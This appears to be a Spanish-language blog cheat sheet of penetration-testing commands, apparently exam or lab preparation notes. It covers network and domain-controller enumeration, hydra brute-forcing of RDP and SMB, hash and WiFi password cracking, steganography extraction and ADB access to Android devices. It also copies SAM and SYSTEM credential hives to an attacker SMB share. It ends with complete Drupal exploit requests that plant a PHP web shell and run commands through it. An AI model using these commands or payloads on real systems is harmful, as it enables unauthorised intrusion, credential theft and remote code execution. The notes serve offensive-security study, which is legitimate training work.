NOTES V12
NOTAS....
COMANDOS.
Para enumerar la red
sudo arp-scan -local
netdiscover -i 192.168.10.1
nmap -sn ip/24
Este comando sirve para identificar el DC, tambien es posible con el 389
nmap --script smb-os-discovery -p 445 192.168.10.1<DC>
Comando para buscar el DC, con protocolos comunes.
nmap -p 53,88,389,636 --open -sV 192.168.10.1/24
Comando para buscar productos basado en WEB.
nmap -p 80,443,8080,8443 --open -sV -A 192.168.10.1/24
Para buscar temas relacionados a SMB
sudo nmap -T4 -sS -p 139,445 --script vuln 192.168.0.0/24
Tambien es posible usar, pero es mejor comprobar en el equipo para sacar el FQDN
nslookup 192.168.10.1
EJEMPLOS DE SERVICIOS, no olvidarse de escanear todas las redes.
nmap -sV -p 25,80,110,143 192.168.10.1/24
PROTOCOLO RDP
nmap -p 3389 --open -sV 192.168.10.1/24
CRACKING PASSWORD HYDRA
hydra -t 1 -V -f -l Test -P /home/thedaniux/Dic.txt rdp://192.168.10.1
CRACKING CON OPENSSL
openssl enc -aes-256-cbc -d -in file.cfe -out decrypted_image.jpg -k Contrasena123
Decifrar o sacar sum.
cksum decrypted_image.jpg
Online Servicio
https://emn178.github.io/online-tools/crc/
Extrae informacion de una imagen Linux Tool.
steghide extract -sf Wallpaper.jpg
Windows Tool.
snow.exe -C -p "test" confidential.txt
- C compressing / uncompressing
-p password
Open Stego
GUI tool
Como conectarse conectarse mediante Android
nmap -p 80,443,8080,8443,5228 --open 192.168.10.0/24
Conectarse via ADB
adb connect 192.168.10.1:5555
adb shell
find /sdcard/ -name "*.jpg" -o -name "*.png"
Descarga una imagen a una ruta especifica.
adb pull /sdcard/test/imagen.jpg ./download.jpg
Encontrar archivos
find / -type f -name ArchivBuscar.txt 2> /dev/null
34
Me Permite sacar informarmacion oculta.
stegsnow -p ContrasenaFile -C OcultoArchivo.txt salida.txt
SMB
nmap -p 139,445 --open -sV 192.168.10.0/24
CRACKED SMB
hydra -L users.txt -P password.txt 192.168.10.1 smb
Interactuar con smb.
smbclient \\\\\\\\192.168.10.1\\\\Recurso -U usuario%password
Identificar puertos usados por el RAT.
nmap -p 445,8080,3389 --open 192.168.10.0/24
65
NA
66
PAra filtrar trafico a una ip destino
ip.dst==172.22.10.10
Revisar drupal
/core/CHANGELOG.txt
Crackear archivos o hashs
john --format=Raw-MD5 --wordlist=Wordlist.txt PasswordEncriptada.txt
WIFI HACKING
Permite identificar el SSID BSSID y canal del WIFI
airodump-ng Thedaniux.cap
Usa airodump-ng para capturar más paquetes relacionados con el AP:
Esto generará un archivo llamado Hackerman-01.cap
airodump-ng --bssid 00:00:00:00:00:00 --channel 10 -w outputfile Hackerman.cap
Crackear password
aircrack-ng -w /home/thedaniux/wordlist.txt CapturadorWIFI.cap
Este comando sirve para filtrar el protocolo MQTT
mqtt.msgtype == 3
Se puede calcualr la entropia de un archivo mediante ent,
ent Archivito.elf
Luego se puede incluso sacar el HASH.
Escane vulnerabilidades.
nmap -Pn - -script vuln 172.20.0.16
Escaner Protocolos que se pueda iniciar sesion
nmap -p 22,23,80,3389 192.168.0.0/24
ddos2
- ¿Por Qué Usar el Filtro
tcp.flags.syn == 1 and tcp.flags.ack == 0
• Un ataque DDoS a menudo se basa en el envío masivo de solicitudes de inicio de conexión (SYN flood) para saturar los recursos del servidor.
- ¿Qué Representa Statistics > Conversations**?**
• Este panel muestra todas las conversaciones IPv4 (IP origen a IP destino) con información como:
• Número de paquetes enviados (Packets A→B).
• Bytes transmitidos (Bytes A→B).
Puertos comunes usados por RATS
nmap -p 9871,6703 192.168.0.0/24
Crear server SMB
impacket-smbserver smbFolder $(pwd) -smb2support -username admin -password admin
Conectarse al server.
net use x: \\\\192.168.10.1\\smbFolder /user:admin admin
COPIARSE EL NTDS DE LA MAQUINA LOCAL
Paso los archivos
copy sam.backup x:\\sam
copy system.backup x:\\system
------------------------
POST /?q=user%2Fpassword&name%5B%23post_render%5D%5B%5D=passthru&name%5B%23type%5D=markup&name%5B%23markup%5D=echo+'<%3fphp+system($_GET["cmd"])%3b+%3f>'+>+shell.php;ls HTTP/1.1
Host: 10.203.23.131:8080
Content-Length: 98
Cache-Control: max-age=0
Accept-Language: es-419,es;q=0.9
Origin: http://10.203.23.131:8080
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://10.203.23.131:8080/user/password
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
form_id=user_pass&_triggering_element_name=name&_triggering_element_value=&opz=E-mail+new+Password
Segunda PETICION
POST /?q=file%2Fajax%2Fname%2F%23value%2Fform-eGM2LCnwCRK0HyXkZRIYOQWvuwh36DFdBPjME0_7KCU HTTP/1.1
Host: 10.203.23.131:8080
Content-Length: 62
Cache-Control: max-age=0
Accept-Language: es-419,es;q=0.9
Origin: http://10.203.23.131:8080
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://10.203.23.131:8080/user/password
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
form_build_id=form-eGM2LCnwCRK0HyXkZRIYOQWvuwh36DFdBPjME0_7KCU
buscar form_build_id
http://172.20.10.3:8080/shell.php?cmd=ls
Comentarios
Publicar un comentario